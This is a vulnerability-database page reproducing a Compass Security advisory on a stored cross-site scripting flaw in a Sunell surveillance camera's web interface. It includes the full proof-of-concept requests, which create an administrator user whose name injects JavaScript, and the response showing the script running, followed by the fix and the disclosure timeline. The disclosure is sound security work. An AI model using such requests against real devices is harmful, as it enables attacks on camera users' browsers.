Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sunell IPR54/14AKDN(II)/13 Cross Site Scripting

🗓️ 27 May 2017 00:00:00Reported by Stephan SekulaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 69 Views

Sunell IPR54/14AKDN(II)/13 XSS Fla

Code
`#############################################################  
#  
# COMPASS SECURITY ADVISORY  
# https://www.compass-security.com/research/advisories/  
#  
#############################################################  
#  
# Product: Sunell IPR54/14AKDN(II)/13 [1]  
# Vendor: Shenzhen Sunell Technology Corporation  
# CSNC ID: CSNC-2017-011  
# Subject: Stored Cross-Site Scripting  
# Risk: High  
# Effect: Remotely exploitable  
# Author: Stephan Sekula <[email protected]>  
# Date: 18.04.2017  
#  
#############################################################  
  
Introduction:  
-------------  
Sunell's IPR54/14AKDN(II)/13 is an all-in-one Bullet camera designed for indoor  
and outdoor applications. Equipped with a 2MP sensor enabling viewing  
resolution of 1920*1080 at a smooth 30fps.The camera is capable of capturing  
high quality video at high resolution of up to 2MP even in low light environments. [1]  
  
Compass Security discovered a web application security flaw in the camera's  
web interface, which allows an attacker to manipulate the resulting website.  
This allows, for instance, attacking the user's browser or redirecting the  
user to a phishing website. In order to do so, the attacker needs to, e.g., change  
the current user's username.  
  
  
Affected:  
---------  
Vulnerable:  
* v2.0.0801.1002.1.1.136.0.0  
  
  
Technical Description  
---------------------  
The camera's web interface employs a username, which can be manipulated.  
If this parameter contains JavaScript code, it is executed in the user's  
browser, once a page is visited, which contains the username. Exploiting  
the vulnerability will lead to so-called Cross-Site Scripting (XSS),  
allowing the execution of JavaScript in the context of the victim.  
  
Request:  
POST /goform/WEB_SetValueByAjax HTTP/1.1  
Host: 192.168.0.120  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded;charset=utf-8  
Referer: http://192.168.0.120/asppage/common/index.asp?ID=10200&lg=1  
Content-Length: 502  
Connection: close  
  
XMLData=<MPLDCProtocol ProtocolType="1"><MPLDCPDeviceConfig ReturnValue="0" OperateType="2"><DeviceInfoEx User="" Password="" IP="192.168.0.120" Port="30001" DeviceID="0BCF7B"/><DeviceConfigID ID="DeviceConfig_AddUser"/><ConfigItem ID="ID_AddUserName" Value="csnc';alert(0);'"/><ConfigItem ID="ID_Password" Value="Password.123"/><ConfigItem ID="ID_PrivilegeGroup" Value="Administrators"/><ConfigItem ID="ID_MultiLoginFlag" Value="true"/></MPLDCPDeviceConfig></MPLDCProtocol>&ID=10200&LanguageId=1&Num=2  
  
  
After a new user with manipulated username has been created, this user  
is used to login.  
  
  
Request (accessing page /asppage/common/ipc_privilegeuser.asp while being logged in as user csnc';alert(0);'):  
GET /asppage/common/ipc_privilegeuser.asp?ID=56486&random=0.6518143656183069 HTTP/1.1  
Host: 192.168.0.120  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.120/asppage/common/deviceConfig.asp?ID=56486&lg=1&random=0.4818473020393146  
Cookie: coobjMenuTree=PrivilegeManager; csobjMenuTree=User  
Connection: close  
  
Response:  
HTTP/1.0 200 OK  
Server: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.4.2-OPEN  
Cache-Control: max-age=180  
Content-type: text/html  
  
i>>?<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<html>  
<head>  
[CUT]  
<script language=javascript> function getdata() {  
var currentLoginUserName = 'csnc';alert(0);'';document.getElementById('pwdType').value = 2; return currentLoginUserName }</script>  
[CUT]  
</body>  
</html>  
  
  
Workaround / Fix:  
-----------------  
This issue can be fixed by properly encoding all output, which is posted back  
to the user. For instance, using HTML encoding, to convert < to < and > to >.  
  
  
Timeline:  
---------  
2017-05-18: Public disclosure date  
2017-04-18: Vendor notification (No response)  
2017-03-22: Initial vendor notification (No response)  
2017-03-22: Discovery by Stephan Sekula  
  
  
References:  
-----------  
[1] http://www.sunellsecurity.com  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 May 2017 00:00Current
sunell cameracross-site scriptingcompass security
69